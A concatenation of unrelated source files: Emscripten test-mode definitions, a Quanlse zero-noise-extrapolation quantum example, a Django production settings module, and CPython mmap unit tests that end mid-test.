os.chdir(self.get_dir()) # Ensure the directory exists and go there
for k, v in settings.items():
self.set_setting(k, v)
self.emcc_args += emcc_args
if node_args:
TT.original = self.node_args
self.node_args.append(node_args)
TT.setUp = setUp
return TT
# Main wasm test modes
core0 = make_run('core0', emcc_args=['-O0'])
core0g = make_run('core0g', emcc_args=['-O0', '-g'])
core1 = make_run('core1', emcc_args=['-O1'])
core2 = make_run('core2', emcc_args=['-O2'])
core2g = make_run('core2g', emcc_args=['-O2', '-g'])
core3 = make_run('core3', emcc_args=['-O3'])
cores = make_run('cores', emcc_args=['-Os'])
corez = make_run('corez', emcc_args=['-Oz'])
core64 = make_run('core64', emcc_args=['-O0', '-g3'],
settings={'MEMORY64': 2}, env=None, node_args='--experimental-wasm-bigint')
lto0 = make_run('lto0', emcc_args=['-flto', '-O0'])
lto1 = make_run('lto1', emcc_args=['-flto', '-O1'])
lto2 = make_run('lto2', emcc_args=['-flto', '-O2'])
lto3 = make_run('lto3', emcc_args=['-flto', '-O3'])
ltos = make_run('ltos', emcc_args=['-flto', '-Os'])
ltoz = make_run('ltoz', emcc_args=['-flto', '-Oz'])
thinlto0 = make_run('thinlto0', emcc_args=['-flto=thin', '-O0'])
thinlto1 = make_run('thinlto1', emcc_args=['-flto=thin', '-O1'])
thinlto2 = make_run('thinlto2', emcc_args=['-flto=thin', '-O2'])
thinlto3 = make_run('thinlto3', emcc_args=['-flto=thin', '-O3'])
thinltos = make_run('thinltos', emcc_args=['-flto=thin', '-Os'])
thinltoz = make_run('thinltoz', emcc_args=['-flto=thin', '-Oz'])
wasm2js0 = make_run('wasm2js0', emcc_args=['-O0'], settings={'WASM': 0})
wasm2js1 = make_run('wasm2js1', emcc_args=['-O1'], settings={'WASM': 0})
wasm2js2 = make_run('wasm2js2', emcc_args=['-O2'], settings={'WASM': 0})
wasm2js3 = make_run('wasm2js3', emcc_args=['-O3'], settings={'WASM': 0})
wasm2jss = make_run('wasm2jss', emcc_args=['-Os'], settings={'WASM': 0})
wasm2jsz = make_run('wasm2jsz', emcc_args=['-Oz'], settings={'WASM': 0})
# Secondary test modes - run directly when there is a specific need
# features
simd2 = make_run('simd2', emcc_args=['-O2', '-msimd128'])
bulkmem2 = make_run('bulkmem2', emcc_args=['-O2', '-mbulk-memory'])
wasmfs = make_run('wasmfs', emcc_args=['-O2', '-DWASMFS'], settings={'WASMFS': 1})
# SAFE_HEAP/STACK_OVERFLOW_CHECK
core2s = make_run('core2s', emcc_args=['-O2'], settings={'SAFE_HEAP': 1})
core2ss = make_run('core2ss', emcc_args=['-O2'], settings={'STACK_OVERFLOW_CHECK': 2})
# Add DEFAULT_TO_CXX=0
strict = make_run('strict', emcc_args=[], settings={'STRICT': 1})
lsan = make_run('lsan', emcc_args=['-fsanitize=leak', '--profiling'], settings={'ALLOW_MEMORY_GROWTH': 1})
asan = make_run('asan', emcc_args=['-fsanitize=address', '--profiling'], settings={'ALLOW_MEMORY_GROWTH': 1})
asani = make_run('asani', emcc_args=['-fsanitize=address', '--profiling', '--pre-js', os.path.join(os.path.dirname(__file__), 'asan-no-leak.js')],
settings={'ALLOW_MEMORY_GROWTH': 1})
# Experimental modes (not tested by CI)
lld = make_run('lld', emcc_args=[], settings={'LLD_REPORT_UNDEFINED': 1})
minimal0 = make_run('minimal0', emcc_args=['-g'], settings={'MINIMAL_RUNTIME': 1})
# TestCoreBase is just a shape for the specific subclasses, we don't test it itself
del TestCoreBase # noqa
|
py | 7dfac424f34bc682587f582455fb2ec2c09d76d9 | #!/usr/bin/python3
# -*- coding: utf8 -*-
# Copyright (c) 2021 Baidu, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Example: Zero-Noise Extrapolation
Zero-noise extrapolation (ZNE) is an increasingly popular technique for
mitigating errors in noisy quantum computations without using additional
quantum resources. In Quanlse, this technique is implemented.
You can access this service via the interface: remoteZNE.remoteZNEMitigation()
Please visit https://quanlse.baidu.com/#/doc/tutorial-ZNE for more details.
"""
import numpy as np
from copy import deepcopy
from Quanlse.ErrorMitigation.ZNE.Extrapolation import extrapolate
from Quanlse.ErrorMitigation.Utils.Visualization import plotZNESequences
from Quanlse.ErrorMitigation.Utils.Utils import computeIdealExpectationValue, \
computeIdealEvolutionOperator, fromCircuitToHamiltonian, randomCircuit, \
computeInverseGate
from Quanlse.Utils.Functions import project, expect
from Quanlse.Utils.Infidelity import unitaryInfidelity
from Quanlse import Define
from Quanlse.remoteSimulator import remoteSimulatorRunHamiltonian as runHamiltonian
from Quanlse.remoteZNE import remoteZNEMitigation as zneMitigation
# Your token:
# Please visit http://quantum-hub.baidu.com
Define.hubToken = ''
# -------------------------------------------------
# Step 1. Formally describe the computational task.
# -------------------------------------------------
# Set the maximal length of the random Clifford circuit.
numSeq = 5
numQubits = 1
# Set the input state and the quantum observable both to |0><0|.
state = np.diag([1, 0]).astype(complex)
A = np.diag([1, 0]).astype(complex)
# Set the maximal extrapolation order.
order = 2
# Considering the reproducibility of our calculation result,
# we may as well set the "random seed" as a fixed value (e.g. 123).
circuit = randomCircuit(qubits=1, numSeq=numSeq, seed=123)
# Construct the identity-equivalent quantum circuit by appending an inverse gate to the end.
circuitIdentity = circuit + [computeInverseGate(circuit)]
# Compute the ideal expectation value (should be 1.0) and the ideal evolution operator.
valueIdeal = computeIdealExpectationValue(state, circuitIdentity, A)
unitaryIdeal = computeIdealEvolutionOperator(circuitIdentity)
# Compute the optimized Hamiltonian for implementing the quantum circuit.
# The built-in Quanlse Scheduler will be called.
ham = fromCircuitToHamiltonian(circuitIdentity)
# Use the optimized Hamiltonian to compute the implemented evolution unitary,
# the infidelity, and the noisy expectation value.
result = runHamiltonian(ham)
unitaryNoisy = project(result.result[0]["unitary"], ham.subSysNum, ham.sysLevel, 2)
infid = unitaryInfidelity(unitaryIdeal, unitaryNoisy, numQubits)
noisyValue = expect(A, unitaryNoisy @ state @ unitaryNoisy.conj().T)
# Print the ideal and noisy expectation values.
print("The ideal expectation value: {}; The noisy expectation: {}".format(valueIdeal, noisyValue))
print("The ideal evolutionary operator:")
print(unitaryIdeal.round(3))
print('The noisy evolutionary operator:')
print(unitaryNoisy.round(3))
print("The implemented evolution unitary has infidelity: ", infid)
# -----------------------------------------------------------------------
# Step 2. Use the ZNE method to improve the accuracy of expectation value.
# -----------------------------------------------------------------------
EsRescaled = [] # EsRescaled size: [numSeq, order + 1]
EsExtrapolated = [] # EsExtrapolated size: [numSeq, order]
EsIdeal = [] # EsIdeal size: [numSeq,]
Infidelities = [] # Infidelities size: [numSeq, order + 1]
for length in range(1, numSeq + 1):
print('==' * 20)
print("Clifford circuit length:", length)
# For each sequence, append the equivalent-inverse gate of all the preceding quantum gates
# For each sequence, its length becomes: [1, 2, ..., numSeq] + 1
circuitPart = deepcopy(circuit[:length])
lastGate = computeInverseGate(circuitPart)
circuitPart.append(lastGate)
# Compute ideal expectations firstly for subsequent comparison in figure.
EsIdeal.append(computeIdealExpectationValue(state, circuitPart, A))
# Temporary extrapolated values of each order for each-length circuit.
mitigatedValues = []
# Use the Scheduler to compute the optimal Hamiltonian for this circuit.
ham = fromCircuitToHamiltonian(circuitPart)
# Rescale order: [c_0, c_1, ..., c_d]; extrapolation order: d
mitigatedValueHighest, infidelities, noisyValues = zneMitigation(state, circuitPart, A, ham=ham, order=order)
# Rescale order: [c_0, c_1], [c_0, c_1, c_2], ...., [c_0, ..., c_{d-1}]
# Loop: for d in [1, ..., d - 1]
for d in range(1, order):
mitigatedValue = extrapolate(infidelities[:(d + 1)], noisyValues[:(d + 1)], type='richardson', order=d)
mitigatedValues.append(mitigatedValue)
mitigatedValues.append(mitigatedValueHighest)
EsExtrapolated.append(mitigatedValues)
EsRescaled.append(noisyValues)
Infidelities.append(infidelities)
# X-axis represents length of quantum circuit, Y-axis represents expectation values.
plotZNESequences(EsRescaled, EsExtrapolated, EsIdeal, fileName='zne-single-qubit-clifford')
# To better illustrate extrapolation technique, in the following we compute,
# the error mitigated values using only the 2-order and 3-order rescaled expectation values.
InfidelitiesPartial = np.array(Infidelities)[:, 1:]
EsRescaledPartial = np.array(EsRescaled)[:, 1:]
orderPartial = order - 1
EsExtrapolatedPartial = [] # size: [numSeq, orderPartial]
for i in range(numSeq):
mitigatedValues = []
for d in range(1, orderPartial + 1):
mitigatedValue = extrapolate(InfidelitiesPartial[i][:(d + 1)], EsRescaledPartial[i][:(d + 1)],
type='richardson', order=d)
mitigatedValues.append(mitigatedValue)
EsExtrapolatedPartial.append(mitigatedValues)
plotZNESequences(EsRescaledPartial, EsExtrapolatedPartial, EsIdeal, fileName='zne-single-qubit-clifford-2')
|
py | 7dfac4c89144920f8dd9344796c036b861c2b55c | # -*- coding: utf-8 -*-
'''
Production Configurations
- Use djangosecure
- Use Amazon's S3 for storing static files and uploaded media
- Use mailgun to send emails
- Use Redis on Heroku
'''
from __future__ import absolute_import, unicode_literals
from boto.s3.connection import OrdinaryCallingFormat
from django.utils import six
from .common import * # noqa
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Raises ImproperlyConfigured exception if DJANGO_SECRET_KEY not in os.environ
SECRET_KEY = env("DJANGO_SECRET_KEY")
# This ensures that Django will be able to detect a secure connection
# properly on Heroku.
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# django-secure
# ------------------------------------------------------------------------------
INSTALLED_APPS += ("djangosecure", )
SECURITY_MIDDLEWARE = (
'djangosecure.middleware.SecurityMiddleware',
)
# Make sure djangosecure.middleware.SecurityMiddleware is listed first
MIDDLEWARE_CLASSES = SECURITY_MIDDLEWARE + MIDDLEWARE_CLASSES
# set this to 60 seconds and then to 518400 when you can prove it works
SECURE_HSTS_SECONDS = 60
SECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool(
"DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS", default=True)
SECURE_FRAME_DENY = env.bool("DJANGO_SECURE_FRAME_DENY", default=True)
SECURE_CONTENT_TYPE_NOSNIFF = env.bool(
"DJANGO_SECURE_CONTENT_TYPE_NOSNIFF", default=True)
SECURE_BROWSER_XSS_FILTER = True
SESSION_COOKIE_SECURE = False
SESSION_COOKIE_HTTPONLY = True
SECURE_SSL_REDIRECT = env.bool("DJANGO_SECURE_SSL_REDIRECT", default=True)
# SITE CONFIGURATION
# ------------------------------------------------------------------------------
# Hosts/domain names that are valid for this site
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
ALLOWED_HOSTS = env.list('DJANGO_ALLOWED_HOSTS', default=['iheartjupyterdocs.org'])
# END SITE CONFIGURATION
INSTALLED_APPS += ("gunicorn", )
# STORAGE CONFIGURATION
# ------------------------------------------------------------------------------
# Uploaded Media Files
# ------------------------
# See: http://django-storages.readthedocs.org/en/latest/index.html
INSTALLED_APPS += (
'storages',
)
AWS_ACCESS_KEY_ID = env('DJANGO_AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = env('DJANGO_AWS_SECRET_ACCESS_KEY')
AWS_STORAGE_BUCKET_NAME = env('DJANGO_AWS_STORAGE_BUCKET_NAME')
AWS_AUTO_CREATE_BUCKET = True
AWS_QUERYSTRING_AUTH = False
AWS_S3_CALLING_FORMAT = OrdinaryCallingFormat()
# AWS cache settings, don't change unless you know what you're doing:
AWS_EXPIRY = 60 * 60 * 24 * 7
# TODO See: https://github.com/jschneier/django-storages/issues/47
# Revert the following and use str after the above-mentioned bug is fixed in
# either django-storage-redux or boto
AWS_HEADERS = {
'Cache-Control': six.b('max-age=%d, s-maxage=%d, must-revalidate' % (
AWS_EXPIRY, AWS_EXPIRY))
}
# URL that handles the media served from MEDIA_ROOT, used for managing
# stored files.
MEDIA_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
# Static Assets
# ------------------------
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'
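# Static assets are served by the app itself through WhiteNoise (gzipped,
# manifest-based cache busting), while uploaded media goes to the S3 bucket above.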
# EMAIL
# ------------------------------------------------------------------------------
DEFAULT_FROM_EMAIL = env('DJANGO_DEFAULT_FROM_EMAIL',
default='jupyter_doc <[email protected]>')
EMAIL_BACKEND = 'django_mailgun.MailgunBackend'
MAILGUN_ACCESS_KEY = env('DJANGO_MAILGUN_API_KEY')
MAILGUN_SERVER_NAME = env('DJANGO_MAILGUN_SERVER_NAME')
EMAIL_SUBJECT_PREFIX = env("DJANGO_EMAIL_SUBJECT_PREFIX", default='[jupyter_doc] ')
SERVER_EMAIL = env('DJANGO_SERVER_EMAIL', default=DEFAULT_FROM_EMAIL)
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See:
# https://docs.djangoproject.com/en/dev/ref/templates/api/#django.template.loaders.cached.Loader
TEMPLATES[0]['OPTIONS']['loaders'] = [
('django.template.loaders.cached.Loader', [
'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', ]),
]
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# Raises ImproperlyConfigured exception if DATABASE_URL not in os.environ
DATABASES['default'] = env.db("DATABASE_URL")
# CACHING
# ------------------------------------------------------------------------------
# Heroku URL does not pass the DB number, so we parse it in
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "{0}/{1}".format(env('REDIS_URL', default="redis://127.0.0.1:6379"), 0),
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
"IGNORE_EXCEPTIONS": True, # mimics memcache behavior.
# http://niwinz.github.io/django-redis/latest/#_memcached_exceptions_behavior
}
}
}
# LOGGING CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s '
'%(process)d %(thread)d %(message)s'
},
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose',
},
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True
},
'django.security.DisallowedHost': {
'level': 'ERROR',
'handlers': ['console', 'mail_admins'],
'propagate': True
}
}
}
# Custom Admin URL, use {% url 'admin:index' %}
ADMIN_URL = env('DJANGO_ADMIN_URL')
# Your production stuff: Below this line define 3rd party library settings
|
py | 7dfac4e078e7899aede1fe81a04306a43341ef90 | from test.test_support import (TESTFN, run_unittest, import_module, unlink,
requires, _2G, _4G)
import unittest
import os, re, itertools, socket, sys
mmap = import_module('mmap')
PAGESIZE = mmap.PAGESIZE
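# PAGESIZE is the OS memory-page size; the tests below size their maps and
# offsets in multiples of it so they behave the same across platforms.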
class MmapTests(unittest.TestCase):
def setUp(self):
if os.path.exists(TESTFN):
os.unlink(TESTFN)
def tearDown(self):
try:
os.unlink(TESTFN)
except OSError:
pass
def test_basic(self):
# Test mmap module on Unix systems and Windows
# Create a file to be mmap'ed.
f = open(TESTFN, 'w+')
try:
# Write 2 pages worth of data to the file
f.write('\0'* PAGESIZE)
f.write('foo')
f.write('\0'* (PAGESIZE-3) )
f.flush()
m = mmap.mmap(f.fileno(), 2 * PAGESIZE)
f.close()
# Simple sanity checks
tp = str(type(m)) # SF bug 128713: segfaulted on Linux
self.assertEqual(m.find('foo'), PAGESIZE)
self.assertEqual(len(m), 2*PAGESIZE)
self.assertEqual(m[0], '\0')
self.assertEqual(m[0:3], '\0\0\0')
# Shouldn't crash on boundary (Issue #5292)
self.assertRaises(IndexError, m.__getitem__, len(m))
self.assertRaises(IndexError, m.__setitem__, len(m), '\0')
# Modify the file's content
m[0] = '3'
m[PAGESIZE +3: PAGESIZE +3+3] = 'bar'
# Check that the modification worked
self.assertEqual(m[0], '3')
self.assertEqual(m[0:3], '3\0\0')
self.assertEqual(m[PAGESIZE-1 : PAGESIZE + 7], '\0foobar\0')
m.flush()
# Test doing a regular expression match in an mmap'ed file
match = re.search('[A-Za-z]+', m)
if match is None:
self.fail('regex match on mmap failed!')
else:
start, end = match.span(0)
length = end - start
self.assertEqual(start, PAGESIZE)
self.assertEqual(end, PAGESIZE + 6)
# test seeking around (try to overflow the seek implementation)
m.seek(0,0)
self.assertEqual(m.tell(), 0)
m.seek(42,1)
self.assertEqual(m.tell(), 42)
m.seek(0,2)
self.assertEqual(m.tell(), len(m))
# Try to seek to negative position...
self.assertRaises(ValueError, m.seek, -1)
# Try to seek beyond end of mmap...
self.assertRaises(ValueError, m.seek, 1, 2)
# Try to seek to negative position...
self.assertRaises(ValueError, m.seek, -len(m)-1, 2)
# Try resizing map
try:
m.resize(512)
except SystemError:
# resize() not supported
# No messages are printed, since the output of this test suite
# would then be different across platforms.
pass
else:
# resize() is supported
self.assertEqual(len(m), 512)
# Check that we can no longer seek beyond the new size.
self.assertRaises(ValueError, m.seek, 513, 0)
# Check that the underlying file is truncated too
# (bug #728515)
f = open(TESTFN)
f.seek(0, 2)
self.assertEqual(f.tell(), 512)
f.close()
self.assertEqual(m.size(), 512)
m.close()
finally:
try:
f.close()
except OSError:
pass
def test_access_parameter(self):
# Test for "access" keyword parameter
mapsize = 10
with open(TESTFN, "wb") as f:
f.write("a"*mapsize)
f = open(TESTFN, "rb")
m = mmap.mmap(f.fileno(), mapsize, access=mmap.ACCESS_READ)
self.assertEqual(m[:], 'a'*mapsize, "Readonly memory map data incorrect.")
# Ensuring that readonly mmap can't be slice assigned
try:
m[:] = 'b'*mapsize
except TypeError:
pass
else:
self.fail("Able to write to readonly memory map")
# Ensuring that readonly mmap can't be item assigned
try:
m[0] = 'b'
except TypeError:
pass
else:
self.fail("Able to write to readonly memory map")
# Ensuring that readonly mmap can't be write() to
try:
m.seek(0,0)
m.write('abc')
except TypeError:
pass
else:
self.fail("Able to write to readonly memory map")
# Ensuring that readonly mmap can't be write_byte() to
try:
m.seek(0,0)
m.write_byte('d')
except TypeError:
pass
else:
self.fail("Able to write to readonly memory map")
# Ensuring that readonly mmap can't be resized
try:
m.resize(2*mapsize)
except SystemError: # resize is not universally supported
pass
except TypeError:
pass
else:
self.fail("Able to resize readonly memory map")
f.close()
m.close()
del m, f
with open(TESTFN, "rb") as f:
self.assertEqual(f.read(), 'a'*mapsize,
"Readonly memory map data file was modified")
# Opening mmap with size too big
import sys
f = open(TESTFN, "r+b")
try:
m = mmap.mmap(f.fileno(), mapsize+1)
except ValueError:
# we do not expect a ValueError on Windows
# CAUTION: This also changes the size of the file on disk, and
# later tests assume that the length hasn't changed. We need to
# repair that.
if sys.platform.startswith('win'):
self.fail("Opening mmap with size+1 should work on Windows.")
else:
# we expect a ValueError on Unix, but not on Windows
if not sys.platform.startswith('win'):
self.fail("Opening mmap with size+1 should raise ValueError.")
m.close()
f.close()
if sys.platform.startswith('win'):
# Repair damage from the resizing test.
f = open(TESTFN, 'r+b')
f.truncate(mapsize)
f.close()
# Opening mmap with access=ACCESS_WRITE
f = open(TESTFN, "r+b")
m = mmap.mmap(f.fileno(), mapsize, access=mmap.ACCESS_WRITE)
# Modifying write-through memory map
m[:] = 'c'*mapsize
self.assertEqual(m[:], 'c'*mapsize,
"Write-through memory map memory not updated properly.")
m.flush()
m.close()
f.close()
f = open(TESTFN, 'rb')
stuff = f.read()
f.close()
self.assertEqual(stuff, 'c'*mapsize,
"Write-through memory map data file not updated properly.")
# Opening mmap with access=ACCESS_COPY
f = open(TESTFN, "r+b")
m = mmap.mmap(f.fileno(), mapsize, access=mmap.ACCESS_COPY)
# Modifying copy-on-write memory map
m[:] = 'd'*mapsize
self.assertEqual(m[:], 'd' * mapsize,
"Copy-on-write memory map data not written correctly.")
m.flush()
f.close()
with open(TESTFN, "rb") as f:
self.assertEqual(f.read(), 'c'*mapsize,
"Copy-on-write test data file should not be modified.")
# Ensuring copy-on-write maps cannot be resized
self.assertRaises(TypeError, m.resize, 2*mapsize)
m.close()
del m, f
# Ensuring invalid access parameter raises exception
f = open(TESTFN, "r+b")
self.assertRaises(ValueError, mmap.mmap, f.fileno(), mapsize, access=4)
f.close()
if os.name == "posix":
# Try incompatible flags, prot and access parameters.
f = open(TESTFN, "r+b")
self.assertRaises(ValueError, mmap.mmap, f.fileno(), mapsize,
flags=mmap.MAP_PRIVATE,
prot=mmap.PROT_READ, access=mmap.ACCESS_WRITE)
f.close()
# Try writing with PROT_EXEC and without PROT_WRITE
prot = mmap.PROT_READ | getattr(mmap, 'PROT_EXEC', 0)
with open(TESTFN, "r+b") as f:
m = mmap.mmap(f.fileno(), mapsize, prot=prot)
self.assertRaises(TypeError, m.write, b"abcdef")
self.assertRaises(TypeError, m.write_byte, 0)
m.close()
def test_bad_file_desc(self):
# Try opening a bad file descriptor...
self.assertRaises(mmap.error, mmap.mmap, -2, 4096)
def test_tougher_find(self):
# Do a tougher .find() test. SF bug 515943 pointed out that, in 2.2,
# searching for data with embedded \0 bytes didn't work.
f = open(TESTFN, 'w+')
data = 'aabaac\x00deef\x00\x00aa\x00'
n = len(data)
f.write(data)
f.flush()
m = mmap.mmap(f.fileno(), n)
f.close()
for start in range(n+1):
for finish in range(start, n+1):
slice = data[start : finish]
self.assertEqual(m.find(slice), data.find(slice))
self.assertEqual(m.find(slice + 'x'), -1)
m.close()
def test_find_end(self):
# test the new 'end' parameter works as expected
f = open(TESTFN, 'w+')
data = 'one two ones'
n = len(data)
f.write(data)
f.flush()
m = mmap.mmap(f.fileno(), n)
f.close()
self.assertEqual(m.find('one'), 0)
self.assertEqual(m.find('ones'), 8)
self.assertEqual(m.find('one', 0, -1), 0)
self.assertEqual(m.find('one', 1), 8)
self.assertEqual(m.find('one', 1, -1), 8)
self.assertEqual(m.find('one', 1, -2), -1)
m.close()
def test_rfind(self):
# test the new 'end' parameter works as expected
f = open(TESTFN, 'w+')
data = 'one two ones'
n = len(data)
f.write(data)
f.flush()
m = mmap.mmap(f.fileno(), n)
f.close()
self.assertEqual(m.rfind('one'), 8)
self.assertEqual(m.rfind('one '), 0)
self.assertEqual(m.rfind('one', 0, -1), 8)
self.assertEqual(m.rfind('one', 0, -2), 0)
self.assertEqual(m.rfind('one', 1, -1), 8)
self.assertEqual(m.rfind('one', 1, -2), -1)
m.close()
def test_double_close(self):
# make sure a double close doesn't crash on Solaris (Bug# 665913)
f = open(TESTFN, 'w+')
f.write(2**16 * 'a') # Arbitrary character
f.close()
f = open(TESTFN)
mf = mmap.mmap(f.fileno(), 2**16, access=mmap.ACCESS_READ)
mf.close()
mf.close()
f.close()
def test_entire_file(self):
# test mapping of entire file by passing 0 for map length
if hasattr(os, "stat"):
f = open(TESTFN, "w+")
f.write(2**16 * 'm') # Arbitrary character
f.close()
f = open(TESTFN, "rb+")
mf = mmap.mmap(f.fileno(), 0)
self.assertEqual(len(mf), 2**16, "Map size should equal file size.")
self.assertEqual(mf.read(2**16), 2**16 * "m")
mf.close()
f.close()
def test_length_0_offset(self):
# Issue #10916: test mapping of remainder of file by passing 0 for
# map length with an offset doesn't cause a segfault.
if not hasattr(os, "stat"):
self.skipTest("needs os.stat")
# NOTE: allocation granularity is currently 65536 under Win64,
# and therefore the minimum offset alignment.
with open(TESTFN, "wb") as f:
f.write((65536 * 2) * b'm') # Arbitrary character
with open(TESTFN, "rb") as f:
mf = mmap.mmap(f.fileno(), 0, offset=65536, access=mmap.ACCESS_READ)
try:
self.assertRaises(IndexError, mf.__getitem__, 80000)
finally:
mf.close()
def test_length_0_large_offset(self):
# Issue #10959: test mapping of a file by passing 0 for
# map length with a large offset doesn't cause a segfault.
if not hasattr(os, "stat"):
self.skipTest("needs os.stat")
with open(TESTFN, "wb") as f:
f.write(115699 * b'm') # Arbitrary character
with open(TESTFN, "w+b") as f:
self.assertRaises(ValueError, mmap.mmap, f.fileno(), 0,
offset=2147418112)
def test_move(self):
# make move works everywhere (64-bit format problem earlier)
f = open(TESTFN, 'w+')
f.write("ABCDEabcde") # Arbitrary character
f.flush()
mf = mmap.mmap(f.fileno(), 10)
mf.move(5, 0, 5)
self.assertEqual(mf[:], "ABCDEABCDE", "Map move should have duplicated front 5")
mf.close()
f.close()
# more excessive test
data = "0123456789"
for dest in range(len(data)):
for src in range(len(data)):
for count in range(len(data) - max(dest, src)):
expected = data[:dest] + data[src:src+count] + data[dest+count:]
m = mmap.mmap(-1, len(data))
m[:] = data
m.move(dest, src, count)
self.assertEqual(m[:], expected)
m.close()
# segfault test (Issue 5387)
m = mmap.mmap(-1, 100)
offsets = [-100, -1, 0, 1, 100]
for source, dest, size in itertools.product(offsets, offsets, offsets):
try:
m.move(source, dest, size)
except ValueError:
pass
offsets = [(-1, -1, -1), (-1, -1, 0), (-1, 0, -1), (0, -1, -1),
(-1, 0, 0), (0, -1, 0), (0, 0, -1)]
for source, dest, size in offsets:
self.assertRaises(ValueError, m.move, source, dest, size)
m.close()
m = mmap.mmap(-1, 1) # single byte
self.assertRaises(ValueError, m.move, 0, 0, 2)
self.assertRaises(ValueError, m.move, 1, 0, 1)
self.assertRaises(ValueError, m.move, 0, 1, 1)
m.move(0, 0, 1)
m.move(0, 0, 0)
def test_anonymous(self):
# anonymous mmap.mmap(-1, PAGE)
m = mmap.mmap(-1, PAGESIZE)
for x in xrange(PAGESIZE):
self.assertEqual(m[x], '\0', "anonymously mmap'ed contents should be zero")
for x in xrange(PAGESIZE):
m[x] = ch = chr(x & 255)
self.assertEqual(m[x], ch)
def test_extended_getslice(self):
# Test extended slicing by comparing with list slicing.
s = "".join(chr(c) for c in reversed(range(256)))
m = mmap.mmap(-1, len(s))
m[:] = s
self.assertEqual(m[:], s)
indices = (0, None, 1, 3, 19, 300, -1, -2, -31, -300)
for start in indices:
for stop in indices:
# Skip step 0 (invalid)
for step in indices[1:]:
self.assertEqual(m[start:stop:step],
s[start:stop:step])
def test_extended_set_del_slice(self):
# Test extended slicing by comparing with list slicing.
s = "".join(chr(c) for c in reversed(range(256)))
m = mmap.mmap(-1, len(s))
indices = (0, None, 1, 3, 19, 300, -1, -2, -31, -300)
for start in indices:
for stop in indices:
# Skip invalid step 0
for step in indices[1:]:
m[:] = s
self.assertEqual(m[:], s)
L = list(s)
# Make sure we have a slice of exactly the right length,
# but with different data.
data = L[start:stop:step]
data = "".join(reversed(data))
L[start:stop:step] = data
m[start:stop:step] = data
self.assertEqual(m[:], "".join(L))
def make_mmap_file (self, f, halfsize):
# Write 2 pages worth of data to the file
f.write ('\0' * halfsize)
f.write ('foo')
f.write ('\0' * (halfsize - 3))
f.flush ()
return mmap.mmap (f.fileno(), 0)
def test_offset (self):
f = open (TESTFN, 'w+b')
try: # unlink TESTFN no matter what
halfsize = mmap.ALLOCATIONGRANULARITY
m = self.make_mmap_file (f, halfsize)
m.close ()
f.close ()
mapsize = halfsize * 2
# Try invalid offset
f = open(TESTFN, "r+b")
for offset in [-2, -1, None]:
try:
m = mmap.mmap(f.fileno(), mapsize, offset=offset)
self.assertEqual(0, 1)
except (ValueError, TypeError, OverflowError):
pass
else:
self.assertEqual(0, 0)
f.close()
# Try valid offset, hopefully 8192 works on all OSes
f = open(TESTFN, "r+b")
m = mmap.mmap(f.fileno(), mapsize - halfsize, offset=halfsize)
self.assertEqual(m[0:3], 'foo')
f.close()
# Try resizing map
try:
m.resize(512)
except SystemError:
pass
else:
# resize() is supported
self.assertEqual(len(m), 512)
# Check that we can no longer seek beyond the new size.
self.assertRaises(ValueError, m.seek, 513, 0)
# Check that the content is not changed
self.assertEqual(m[0:3], 'foo')
# Check that the underlying file is truncated too
f = open(TESTFN)
f.seek(0, 2)
self.assertEqual(f.tell(), halfsize + 512)
f.close()
self.assertEqual(m.size(), halfsize + 512)
m.close()
finally:
f.close()
try:
os.unlink(TESTFN)
except OSError:
pass
def test_subclass(self):
class anon_mmap(mmap.mmap):
def __new__(klass, *args, **kwargs):
return mmap.mmap.__new__(klass, -1, *args, **kwargs)
anon_mmap(PAGESIZE)
def test_prot_readonly(self):
if not hasattr(mmap, 'PROT_READ'):
return
mapsize = 10
with open(TESTFN, "wb") as f:
f.write("a"*mapsize)
f = open(TESTFN, "rb")
m = mmap.mmap(f.fileno(), mapsize, prot=mmap.PROT_READ)
self.assertRaises(TypeError, m.write, "foo")
f.close()
def test_error(self):
self.assertTrue(issubclass(mmap.error, EnvironmentError))
self.assertIn("mmap.error", str(mmap.error))
def test_io_methods(self):
data = "0123456789"
with open(TESTFN, "wb") as f:
f.write("x"*len(data))
f = open(TESTFN, "r+b")
m = mmap.mmap(f.fileno(), len(data))
f.close()
# Test write_byte()
for i in xrange(len(data)):
self.assertEqual(m.tell(), i)
m.write_byte(data[i])
self.assertEqual(m.tell(), i+1)
self.assertRaises(ValueError, m.write_byte, "x")
self.assertEqual(m[:], data)
# Test read_byte()
m.seek(0)
for i in xrange(len(data)):
self.assertEqual(m.tell(), i)
self.assertEqual(m.read_byte(), data[i])
self.assertEqual(m.tell(), i+1)
self.assertRaises(ValueError, m.read_byte)
# Test read()
